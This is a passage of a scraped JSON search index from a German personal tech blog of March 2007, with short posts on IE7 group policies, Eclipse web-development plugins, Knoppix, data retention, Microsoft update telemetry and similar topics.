Übersicht GPO Computer IE 7 Übersicht GPO Benutzer Leider fehlen hier die Einstellungsmöglichkeiten direkt unter Internet Explorer: Benuzterkonfiguration/Windows-Komponenten/Internet Explorer/\nSuchanbieter hinzufügen MS Knowledgebase Artikel (sehr spassig ist übrigens die deutsche Übersetzung!)\nhttp://www.gruppenrichtlinien.de/adm/ie7search.txt MCSEBoard ","excerpt":"\u003ch1 id=\"ausgangslage\"\u003eAusgangslage \u003ca href=\"#ausgangslage\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cp\u003eMit der Einführung des \u003ca href=\"http://www.microsoft.de/ie7/\" target=\"_blank\"\u003eIE7 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n wurde auch die\nadm also die Vorlage für\n\u003ca href=\"http://www.gruppenrichtlinien.de\" target=\"_blank\"\u003eGruppenrichtlinien \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n angepaßt.\u003c/p\u003e\n\u003cp\u003eDie neu eingeführte Zone und die daraus entstandene neue Zuordnung der\nIntranet- und Internetseiten ist erstmal ungewohnt und birgt auch noch\neinige Klippen, die umschifft werden wollen.\u003c/p\u003e\n\u003cp\u003eEigentlich mag ich als Browser den \u003ca href=\"http://www.mozilla.com\" target=\"_blank\"\u003eFirefox \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n, es\ngibt aber leider zu viele Anwendungen, die nur mit dem IE funktionieren\nund die trotzdem verwendet werden (müssen).\u003c/p\u003e\n\u003ch1 id=\"1-versuch\"\u003e1. Versuch \u003ca href=\"#1-versuch\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cp\u003eDer erste Versuch der Anpassung der Einstellungen über GPO ist bei mir\nleider gescheitert. Nach der Aktivierung der meiner Meinung nach nötigen\nEinstellungen ging plötzlich die Authentifizierung am WSUS-Server nicht\nmehr. Vermutlich war die Zonenzuordnung falsch.\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-03-23-gruppenrichtliniensteuerung-fur-den-ie7/","title":"Gruppenrichtliniensteuerung für den IE7"},{"body":"Ich habe mir jetzt noch ein paar Plugins installiert, um direkt aus Eclipse bloggen zu können.\nSieht alles sehr vielversprechend aus und ich muss sagen, wenn das so gut funktioniert wie es im Moment scheint, dann ist das eine echte Alternative zu Textmate oder ähnlichen Erweiterungen.\nFolgende Plugins sind dafür notwendig: Im Blog von “Random Technology” ist in folgendem Beitrag alles wichtige Beschrieben und zusätzlich auf einen Screencast des Plugins verwiesen: Eclipse Blogging Plugin Now Works with BlogCFC .\nFehler bzw. fehlende Funktionen Man merkt allerdings noch, daß es sich um eine sehr frühe Beta-Version handelt, da Sonderzeichen im Moment noch falsch übertragen werden. Kategorien werden richtig zugeordnet, es werden aber keine Neuen angelegt.\n","excerpt":"\u003cp\u003eIch habe mir jetzt noch ein paar Plugins installiert, um direkt aus\nEclipse bloggen zu können.\u003c/p\u003e\n\u003cp\u003eSieht alles sehr vielversprechend aus und ich muss sagen, wenn das so\ngut funktioniert wie es im Moment scheint, dann ist das eine echte\nAlternative zu Textmate oder ähnlichen Erweiterungen.\u003c/p\u003e\n\u003ch1 id=\"folgende-plugins-sind-dafür-notwendig\"\u003eFolgende Plugins sind dafür notwendig: \u003ca href=\"#folgende-plugins-sind-daf%c3%bcr-notwendig\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cp\u003eIm Blog von “Random Technology” ist in folgendem Beitrag alles wichtige\nBeschrieben und zusätzlich auf einen\n\u003ca href=\"http://www.youtube.com/watch?v=0ppNL0TK36U\" target=\"_blank\"\u003eScreencast \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n des Plugins\nverwiesen:\n\u003ca href=\"http://robrohan.com/2007/02/09/eclipse-blogging-plugin-now-works-with-blogcfc/\" target=\"_blank\"\u003eEclipse\nBlogging Plugin Now Works with BlogCFC \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e\n\u003ch1 id=\"fehler-bzw-fehlende-funktionen\"\u003eFehler bzw. fehlende Funktionen \u003ca href=\"#fehler-bzw-fehlende-funktionen\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cp\u003eMan merkt allerdings noch, daß es sich um eine sehr frühe Beta-Version\nhandelt, da Sonderzeichen im Moment noch falsch übertragen werden.\nKategorien werden richtig zugeordnet, es werden aber keine Neuen\nangelegt.\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-03-20-blogging-mit-eclipse/","title":"Blogging mit Eclipse"},{"body":"Jojos illustrierter Blog » Freundin wieder da! Ein supergeiler Comic! Selten soviel Wahrheit und Spaß in einer Zeichnung gesehen!\n","excerpt":"\u003cp\u003e\u003ca href=\"http://blog.beetlebum.de/2007/03/20/freundin-wieder-da/\" target=\"_blank\"\u003eJojos\nillustrierter Blog » Freundin wieder da! \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003cp\u003eEin supergeiler Comic! Selten soviel Wahrheit und Spaß in einer\nZeichnung gesehen!\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-03-20-beetlebumde-freundin-wieder-da/","title":"beetlebum.de – Freundin wieder da"},{"body":"Nach fast einem Jahr Eclipse-Abstinenz habe ich jetzt den neuen Eclipse 3.2.2 unter Mac OS X installiert und bin von der Geschwindigkeit absolut begeistert! Kein Vergleich mehr mit den alten Versionen.\nMan kann die normale Eclipse-SDK installieren, alternativ kann man auch gleich eine Eclipse Distro zur Installation herunterladen und nutzen. Eine sehr gute Distro für C/C++ Entwicklung ist Callisto .\nDa Lotus Notes 8 auf dem Eclipse RichClient basiert, dachte ich mir, daß ich mich auch mit der Entwicklungsumgebung wieder anfreunden sollte.\nJava ist für meine Arbeit und Hobbies leider nicht zu gebrauchen, bzw. die Hürde des Lernens war mir bisher immer zu hoch. Allerdings gibt es sehr gute Plugins für Web- und PHP-Entwicklung.\nIch nutze folgende Plugins:\nWebtools – http://download.eclipse.org/webtools/updates/ PHPEclipse – http://phpeclipse.sourceforge.net/update/releases PDT – http://download.eclipse.org/tools/pdt/updates/ GEF – http://download.eclipse.org/tools/gef/update-site/releases/site.xml Eclipse FTP und WebDAV Support\nDie Plugins können über HELP – SOFTWARE UPDATES – FIND AND INSTALL… installiert werden. Hier einfach eine neue Remote-Site mit den oben gezeigten Links erzeugen und installieren.\nDamit kann ich sehr einfach das Template meiner WordPress-Installation anpassen und für meine Zwecke umprogrammieren. Sehr praktisch empfinde ich hier v.a. das FTP-Plugin, mit dem ich direkt geänderte Dateien hoch- und runterladen kann.\nSyntax-Highlighting halte ich für selbstverständlich und funktioniert auch sehr gut. Eclipse versucht auch in den gefundenen Dateien Fehler zu finden und stellt diese mit kleinen Icons dar.\nAuf diese Weise habe ich einige Syntaxfehler gefunden und gleich behoben. Allerdings kennt er z.B. in meinem WordPress-Template den Installationspfad der Logging-Software nicht und zeigt diesen logischerweise als Fehler.\n","excerpt":"\u003cp\u003eNach fast einem Jahr Eclipse-Abstinenz habe ich jetzt den neuen\n\u003ca href=\"http://www.eclipse.org\" target=\"_blank\"\u003eEclipse 3.2.2 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n unter \u003ca href=\"http://www.apple.com\" target=\"_blank\"\u003eMac OS\nX \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n installiert und bin von der Geschwindigkeit absolut begeistert! Kein\nVergleich mehr mit den alten Versionen.\u003c/p\u003e\n\u003cp\u003eMan kann die normale \u003ca href=\"http://www.eclipse.org/downloads/\" target=\"_blank\"\u003eEclipse-SDK \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\ninstallieren, alternativ kann man auch gleich eine\n\u003ca href=\"http://www.eclipse.org/callisto/downloads.php\" target=\"_blank\"\u003eEclipse Distro \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n zur\nInstallation herunterladen und nutzen. Eine sehr gute Distro für C/C++\nEntwicklung ist \u003ca href=\"http://www.eclipse.org/callisto\" target=\"_blank\"\u003eCallisto \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e\n\u003cp\u003eDa \u003ca href=\"http://www-128.ibm.com/developerworks/lotus\" target=\"_blank\"\u003eLotus Notes 8 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n auf dem\nEclipse RichClient basiert, dachte ich mir, daß ich mich auch mit der\nEntwicklungsumgebung wieder anfreunden sollte.\u003c/p\u003e\n\u003cp\u003eJava ist für meine Arbeit und Hobbies leider nicht zu gebrauchen, bzw.\ndie Hürde des Lernens war mir bisher immer zu hoch. Allerdings gibt es\nsehr gute Plugins für Web- und PHP-Entwicklung.\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-03-19-webentwicklung-mit-eclipse-322/","title":"Webentwicklung mit Eclipse 3.2.2"},{"body":"Eine neue Web2.0 Anwendung findet man auf Mindmeister.com . Ich habe mich für den Newsletter eingetragen und von den Programmierern einen Zugang zum PrivatBetaTest erhalten.\nMindmeister ist eine wirklich schöne Anwendung, mit der sich flüssig arbeiten läßt und für ein paar Mind Maps zwischendurch gerade richtig ist.\nDie Im- und Exportfilter scheinen alle wichtigen Formate (Mindjet Mindmanager und Freemind ) zu unterstützen.\nMan kann natürlich auch Maps veröffentlichen und mit Freunden gleichzeitig bearbeiten.\nHier ein Ausschnitt aus der Beispiel-Map.\n","excerpt":"\u003cp\u003eEine neue Web2.0 Anwendung findet man auf\n\u003ca href=\"http://www.mindmeister.com\" target=\"_blank\"\u003eMindmeister.com \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n. Ich habe mich für den\nNewsletter eingetragen und von den Programmierern einen Zugang zum\nPrivatBetaTest erhalten.\u003c/p\u003e\n\u003cp\u003eMindmeister ist eine wirklich schöne Anwendung, mit der sich flüssig\narbeiten läßt und für ein paar Mind Maps zwischendurch gerade richtig\nist.\u003c/p\u003e\n\u003cp\u003eDie Im- und Exportfilter scheinen alle wichtigen Formate\n(\u003ca href=\"http://www.mindjet.com/de/\" target=\"_blank\"\u003eMindjet Mindmanager \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n und\n\u003ca href=\"http://www.freemind.org\" target=\"_blank\"\u003eFreemind \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n) zu unterstützen.\u003c/p\u003e\n\u003cp\u003eMan kann natürlich auch Maps veröffentlichen und mit Freunden\ngleichzeitig bearbeiten.\u003c/p\u003e\n\u003cp\u003eHier ein Ausschnitt aus der Beispiel-Map.\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"http://www.mindmeister.com\" target=\"_blank\"\u003e\u003cp class=\"md__image\"\u003e\n \u003cimg src=\"http://wp.stoeps.de/wp-content/uploads/2007/03/mindmeister.jpg\" alt=\"Ausschnitt bei Mindmeister.com\" /\u003e\n\u003c/p\u003e\n\n \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-03-17-mind-maps-als-web20/","title":"Mind Maps als Web2.0"},{"body":"webthreads.de » Wenn der VI Editor von Microsoft wäre.. :\nWenn der VI Editor von Microsoft wäre.. Dann würde er wie folgt aussehen:\n:-) SUPER!\nDas wäre wirklich die Überfunktion für meinen Lieblingseditor. Mr. Büroklammer für den VIM .\nDen normalen Vi bekommt ihr hier:\nVim für Windows Vim für Mac OS ","excerpt":"\u003cp\u003e\u003ca href=\"http://www.webthreads.de/2007/03/wenn-der-vi-editor-von-microsoft-waere/\" target=\"_blank\"\u003ewebthreads.de\n» Wenn der VI Editor von Microsoft wäre.. \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003eWenn der VI Editor von Microsoft wäre.. Dann würde er wie folgt\naussehen:\u003c/p\u003e\u003c/blockquote\u003e\n\u003cp\u003e:-) SUPER!\u003c/p\u003e\n\u003cp\u003eDas wäre wirklich die Überfunktion für meinen Lieblingseditor. Mr.\nBüroklammer für den \u003ca href=\"http://www.vim.org/\" target=\"_blank\"\u003eVIM \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e\n\u003cp\u003eDen normalen Vi bekommt ihr hier:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"http://www.vim.org/download.php#pc\" target=\"_blank\"\u003eVim für Windows \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"http://www.vim.org/download.php#mac\" target=\"_blank\"\u003eVim für Mac OS \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e","ref":"https://stoeps.de/posts/2007/2007-03-14-49/","title":"Wenn der vi von Microsoft wäre …"},{"body":"heise online – Knoppix 5.2 mit Virtualisierung und 3D-Desktop :\nWie schon in den vergangenen Jahren erscheint auch zur CeBIT 2007 eine neue Version des Linux-Live-Systems Knoppix. Zu den Neuerungen in Knoppix 5.2 gehört der 3D-Desktop Beryl, den man mit dem Bootparameter 3d startet, und die Integration von sechs verschiedenen Virtualisierungslösungen von Qemu und Virtualbox über Xen und die neuen Kernel-basierten virtuellen Maschinen (KVM) bis zu OpenVZ und VServer.\nCool, endlich eine neue Knoppix Compilation! Und mit diesem Inhalt natürlich hochinteressant. Endlich kann man ohne Eingriffe am Rechner vornehmen zu müssen Beryl und Virtualisierung testen.\nAußerdem ist ein neuer Installer enthalten.\n","excerpt":"\u003cp\u003e\u003ca href=\"http://www.heise.de/newsticker/meldung/86670\" target=\"_blank\"\u003eheise online – Knoppix 5.2\nmit Virtualisierung und 3D-Desktop \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003eWie schon in den vergangenen Jahren erscheint auch zur CeBIT 2007 eine\nneue Version des Linux-Live-Systems Knoppix. Zu den Neuerungen in\nKnoppix 5.2 gehört der 3D-Desktop Beryl, den man mit dem Bootparameter\n3d startet, und die Integration von sechs verschiedenen\nVirtualisierungslösungen von Qemu und Virtualbox über Xen und die neuen\nKernel-basierten virtuellen Maschinen (KVM) bis zu OpenVZ und VServer.\u003c/p\u003e\u003c/blockquote\u003e\n\u003cp\u003eCool, endlich eine neue Knoppix Compilation! Und mit diesem Inhalt\nnatürlich hochinteressant. Endlich kann man ohne Eingriffe am Rechner\nvornehmen zu müssen Beryl und Virtualisierung testen.\u003c/p\u003e\n\u003cp\u003eAußerdem ist ein neuer Installer enthalten.\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-03-13-heise-online-neue-knoppix-52-zur-cebit/","title":"Heise online: Neue Knoppix 5.2 zur Cebit"},{"body":"Gen-Mais: Ratten zeigen Schäden an Leber und Nieren – Greenpeace, Presseerklärungen zum Thema Gentechnik :\n[…]Es gibt erhebliche Mängel in der statistischen Auswertung der Studie, wie sie von Monsanto vorgelegt wurde, sagt Gilles-Eric Séralini von der Universität in Caen, der das französische Wissenschaftler-Team CRIIGEN leitet. Neben den Schäden an Leber und Nieren wurden auch die Gewichtsveränderungen der Tiere nicht ausreichend untersucht. Weitere wichtige Daten, beispielsweise über Veränderungen des Urins der Tiere, ließ Monsanto unter den Tisch fallen.[…]\nHier wird eine wirklich interessante französchische Studie zum Gen-Mais MON863 von Monsanto vorgelegt. In ihr wurden Schäden an Ratten nachgewiesen, die mit dem gentechnisch veränderten Mais gefüttert wurden.\nMON863 ist seit Januar 2006 zugelassenes Futtermittel in der Europäischen Union. Die Zulassungsbehörden haben bisher noch nicht reagiert und MON863 ist weiter zugelassen.\nIch denke dieser Fall zeigt wieder einmal, daß gentechnisch veränderte Lebens- und Futtermittel nicht ungefährlich sind. Sie sind weniger eine Chance, als eine Gefahr!\n","excerpt":"\u003cp\u003e\u003ca href=\"http://www.greenpeace.de/themen/gentechnik/presseerklaerungen/artikel/gen_mais_ratten_zeigen_schaeden_an_leber_und_nieren/\" target=\"_blank\"\u003eGen-Mais:\nRatten zeigen Schäden an Leber und Nieren – Greenpeace,\nPresseerklärungen zum Thema Gentechnik \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003e[…]Es gibt erhebliche Mängel in der statistischen Auswertung der Studie,\nwie sie von Monsanto vorgelegt wurde, sagt Gilles-Eric Séralini von der\nUniversität in Caen, der das französische Wissenschaftler-Team CRIIGEN\nleitet. Neben den Schäden an Leber und Nieren wurden auch die\nGewichtsveränderungen der Tiere nicht ausreichend untersucht. Weitere\nwichtige Daten, beispielsweise über Veränderungen des Urins der Tiere,\nließ Monsanto unter den Tisch fallen.[…]\u003c/p\u003e\u003c/blockquote\u003e\n\u003cp\u003eHier wird eine wirklich interessante französchische Studie zum Gen-Mais\nMON863 von Monsanto vorgelegt. In ihr wurden Schäden an Ratten\nnachgewiesen, die mit dem gentechnisch veränderten Mais gefüttert\nwurden.\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-03-13-greenpeace-gen-mais-verursacht-leber-und-nierenschaden-an-ratten/","title":"Greenpeace: Gen-Mais verursacht Leber- und Nierenschäden an Ratten"},{"body":"heise Security – News – Technische Optionen für die Online-Durchsuchung :\nDatenschützer schlagen Alarm: Die von Politikern und anderen geforderten Online-Durchsuchungen könnten Kollateralschäden bei der allgemeinen Computersicherheit produzieren[…]\nGrins, da ist dann wohl jemand aufgewacht und macht sich Gedanken was das für die Sicherheit der Rechner bedeuten könnte. Es geht aber denke ich nicht nur darum, dass sich die Strafverfolger auf eine Stufe mit Kriminellen stellen, wenn sie die Sicherheitsfunktionen von Betriebssystemen oder Sicherheitssoftware umgehen, sondern sie werden auch noch zusätzlich Sicherheitslöcher aufreissen, da sie ja für zukünftige Durchsuchungen Backdoors oder Trojaner hinterlassen werden und diese auch wieder Sicherheitslücken aufweisen werden.\nWie diese Super-Sony-Software, die ein Rootkit mit Backdoor installierte.\nWie die Datenschützer so schön erkannt haben, ist das für die Behörden ein Interessenkonflikt, da sie einerseits Sicherheitsmaßnahmen fördern wollen und auf der anderen Seite diese Sicherheitsfunktionen für die Onlinedurchsuchung umgehen müssen.\nDas ist meiner Meinung nach, eines der stärksten Argumente gegen die Onlinedurchsuchung. Wichtiger sehe ich allerdings immer noch, daß Beweise bei Onlinedurchsuchungen schwer zu belegen sind.\n","excerpt":"\u003cp\u003e\u003ca href=\"http://www.heise.de/security/news/meldung/86537\" target=\"_blank\"\u003eheise Security – News –\nTechnische Optionen für die Online-Durchsuchung \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003eDatenschützer schlagen Alarm: Die von Politikern und anderen geforderten\nOnline-Durchsuchungen könnten Kollateralschäden bei der allgemeinen\nComputersicherheit produzieren[…]\u003c/p\u003e\u003c/blockquote\u003e\n\u003cp\u003eGrins, da ist dann wohl jemand aufgewacht und macht sich Gedanken was\ndas für die Sicherheit der Rechner bedeuten könnte. Es geht aber denke\nich nicht nur darum, dass sich die Strafverfolger auf eine Stufe mit\nKriminellen stellen, wenn sie die Sicherheitsfunktionen von\nBetriebssystemen oder Sicherheitssoftware umgehen, sondern sie werden\nauch noch zusätzlich Sicherheitslöcher aufreissen, da sie ja für\nzukünftige Durchsuchungen Backdoors oder Trojaner hinterlassen werden\nund diese auch wieder Sicherheitslücken aufweisen werden.\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-03-11-heise-security-technische-optionen-fur-die-online-durchsuchung/","title":"heise Security: Technische Optionen für die Online-Durchsuchung"},{"body":"heise online – Bürgerrechtler gegen siebentägige Speicherung von Verbindungsdaten :\nDer Arbeitskreis Vorratsdatenspeicherung kritisiert in einem offenen Brief die Entscheidung des Bundesdatenschutzbeauftragten Peter Schaar, einer einwöchigen Vorhaltung von Verbindungsdaten durch die T-Com zuzustimmen.\nEs wurde wirklich Zeit, daß mal eine größere Interessengruppe gegen diesen Blödsinn wiederspricht. Es kann einfach nicht sein, daß sämtliche deutschen Provider gegen die Rechtssprechung des Landgerichts Darmstadt und Bestätigung des BGH arbeiten. Bis vor kurzem wurden die Daten noch\nvier Wochen vorgehalten, die Änderung kommt nicht von einem Einlenken der Provider , sondern geschieht aus reinem Platzmangel oder aus Angst, noch mehr Auskünfte wegen Urheberrechtsverletzungen geben zu müssen !\nEs mag sein, daß die neue EU Richtlinie zur Vorratsdatenspeicherung eine Speicherung der Verbindungsdaten verlangt. Im Moment zieht meiner Meinung nach die deutsche Rechtsprechung und das Telekommunikationsgesetz.\nZitat aus TP: Tatsächlich schreibt § 96 des Telekommunikationsgesetzes […] vor, dass Verkehrsdaten “nach Beendigung der Verbindung unverzüglich zu löschen” sind. Ausnahmen von diesem Verbot sind auf Einzelfälle beschränkt. Trotzdem gab der T-Com-Sprecher zu Protokoll, dass die Maßnahme mit dem Bundesdatenschutzbeauftragten Schaar abgestimmt sei.\nJetzt regen sich natürlich die Staatsanwälte auf, weil sie nur noch eine Woche lang an die Daten kommen. Also wenn eine Woche nicht reicht, dann muss man halt bisschen schneller reagieren.\n","excerpt":"\u003cp\u003e\u003ca href=\"http://www.heise.de/newsticker/meldung/86531\" target=\"_blank\"\u003eheise online –\nBürgerrechtler gegen siebentägige Speicherung von Verbindungsdaten \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003eDer Arbeitskreis Vorratsdatenspeicherung kritisiert in einem offenen\nBrief die Entscheidung des Bundesdatenschutzbeauftragten Peter Schaar,\neiner einwöchigen Vorhaltung von Verbindungsdaten durch die T-Com\nzuzustimmen.\u003c/p\u003e\u003c/blockquote\u003e\n\u003cp\u003eEs wurde wirklich Zeit, daß mal eine größere Interessengruppe gegen\ndiesen Blödsinn wiederspricht. Es kann einfach nicht sein, daß sämtliche\ndeutschen Provider gegen die Rechtssprechung des\n\u003ca href=\"http://www.heise.de/newsticker/meldung/68801\" target=\"_blank\"\u003eLandgerichts Darmstadt \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n und\nBestätigung des BGH arbeiten. Bis vor kurzem wurden die Daten noch\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003evier\u003c/strong\u003e Wochen vorgehalten, die Änderung kommt nicht von einem Einlenken\nder \u003ca href=\"http://www.heise.de/tp/r4/artikel/24/24705/1.html\" target=\"_blank\"\u003eProvider \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n, sondern\ngeschieht aus \u003ca href=\"http://www.heise.de/newsticker/meldung/85609\" target=\"_blank\"\u003ereinem\nPlatzmangel oder aus Angst, noch mehr Auskünfte wegen\nUrheberrechtsverletzungen geben zu müssen \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n!\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-03-11-heise-online-burgerrechtler-gegen-siebentagige-speicherung-von-verbindungsdaten/","title":"Heise online: Bürgerrechtler gegen siebentägige Speicherung von Verbindungsdaten"},{"body":"Photos of cats that love Macs :\nThere are many cat lovers among the Mac community and here are some very cool photos of their pets in love with Apple hardware :)\nDa fällt mir ein, ich hab auch noch ein Bild von unserem Mohrle auf dem Macbook:http://wp.stoeps.de/wp-content/uploads/2007/03/mohrle_mac1.jpg[ ]\nSchon witzig, er hat auf dem ganzen Tisch Platz (obwohl er da natürlich nicht hin darf/soll), aber kaum dreht man sich um, wird untersucht, ob man auf dem neuen Teil nicht besser schläft. :-)\n","excerpt":"\u003cp\u003e\u003ca href=\"http://www.nonstopmac.com/2007/03/photos_of_cats_that_love_macs.htm\" target=\"_blank\"\u003ePhotos\nof cats that love Macs \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003eThere are many cat lovers among the Mac community and here are some very\ncool photos of their pets in love with Apple hardware :)\u003c/p\u003e\u003c/blockquote\u003e\n\u003cp\u003eDa fällt mir ein, ich hab auch noch ein Bild von unserem Mohrle auf dem\nMacbook:http://wp.stoeps.de/wp-content/uploads/2007/03/mohrle_mac1.jpg[\u003cp class=\"md__image\"\u003e\n \u003cimg src=\"http://wp.stoeps.de/wp-content/uploads/2007/03/mohrle_mac1.jpg\" alt=\"Mohrle auf dem Macbook\" /\u003e\n\u003c/p\u003e\n\n]\u003c/p\u003e\n\u003cp\u003eSchon witzig, er hat auf dem ganzen Tisch Platz (obwohl er da natürlich\nnicht hin darf/soll), aber kaum dreht man sich um, wird untersucht, ob\nman auf dem neuen Teil nicht besser schläft. :-)\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-03-10-auch-katzen-lieben-macs/","title":"Auch Katzen lieben Macs"},{"body":"heise online – Alle Microsoft-Updates funken nach Redmond :\nAlle Microsoft-Updates funken nach Redmond Quasi als Reaktion auf den Bericht von heise Security, dass die Windows Genuine Advantage Notification nach Redmond funkt, selbst wenn Anwender die Installation abbrechen, hat jetzt ein Microsoft-Entwickler mit dem Pseudonym alexkoc einen Eintrag im WGA-Blog eingestellt.\ns.a. WGA Blog von Microsoft .\nNa toll, ich sehe für so ein Verhalten absolut keinen Grund! Das hat für mich mit Qualitätssicherung nichts zu tun.\nDa kann der Entwickler noch so oft erklären, daß M$ die Informationen nicht nutzt, um User zu kontaktieren oder zu identifizieren, man kann auf diese Weise wunderbar Benutzerprofile, etc. generieren und diese zu Höchstpreisen verkaufen, bzw. für eigene Kampagnen nutzen. Es reicht doch an sich schon eine Statistik, welche Rechner, bzw. Hersteller genutzt werden. Mit diesen Informationen ist man für kommende Vertragsverhandlungen bestens vorbereitet.\nIch halte sowas in Deutschland für bedenklich, da solche Dinge wie die EULA nicht verpflichtend werden, es ist zumindest so, daß benachteiligende Punkte unwirksam sind, wie z.B. das Weiterverkaufsverbot etc. Jetzt wäre es natürlich interessant, ob die nachträgliche EULA in Deutschland zulässig ist. Sollte mal durch Anwälte oder den Bundesdatenschutzbeauftragten geprüft werden.\n","excerpt":"\u003cp\u003e\u003ca href=\"http://www.heise.de/newsticker/meldung/86387/from/rss09\" target=\"_blank\"\u003eheise online –\nAlle Microsoft-Updates funken nach Redmond \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003eAlle Microsoft-Updates funken nach Redmond Quasi als Reaktion auf den\nBericht von heise Security, dass die Windows Genuine Advantage\nNotification nach Redmond funkt, selbst wenn Anwender die Installation\nabbrechen, hat jetzt ein Microsoft-Entwickler mit dem Pseudonym alexkoc\neinen Eintrag im WGA-Blog eingestellt.\u003c/p\u003e\u003c/blockquote\u003e\n\u003cp\u003es.a.\n\u003ca href=\"http://blogs.msdn.com/wga/archive/2007/03/07/wga-notifications-and-download-and-install-telemetry.aspx\" target=\"_blank\"\u003eWGA\nBlog von Microsoft \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e\n\u003cp\u003eNa toll, ich sehe für so ein Verhalten absolut keinen Grund! Das hat für\nmich mit Qualitätssicherung nichts zu tun.\u003c/p\u003e\n\u003cp\u003eDa kann der Entwickler noch so oft erklären, daß M$ die Informationen\nnicht nutzt, um User zu kontaktieren oder zu identifizieren, man kann\nauf diese Weise wunderbar Benutzerprofile, etc. generieren und diese zu\nHöchstpreisen verkaufen, bzw. für eigene Kampagnen nutzen. Es reicht\ndoch an sich schon eine Statistik, welche Rechner, bzw. Hersteller\ngenutzt werden. Mit diesen Informationen ist man für kommende\nVertragsverhandlungen bestens vorbereitet.\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-03-09-heise-online-microsoft-updates-funken-nach-hause/","title":"heise online: Microsoft-Updates funken nach Hause"},{"body":"Get Rules From Users Mailfile auf eknori.de :\nGet Rules From Users Mailfile Posted in Source Code by eknori on the February 13th, 2007 (Visited 146 times) A few days ago I was asked to create a report about all rules in all mailfiles. The easiest way to do this is to write an agent to examine the mailfiles. The result of this scan is stored in a Notes database. Put the following code into an agent ( start: manually from menue, target: All Selected Documents )\nUlrich hat hier einen coolen Code gepostet, um Mailregeln in einer extra Notes-Datenbank zu sammeln. Das sollte datenschutzrechtlich an sich unproblematisch sein und hilft bei Supportanfragen sicher weiter. Gerade bei den Mailregeln habe ich schon die lustigsten Kombinationen 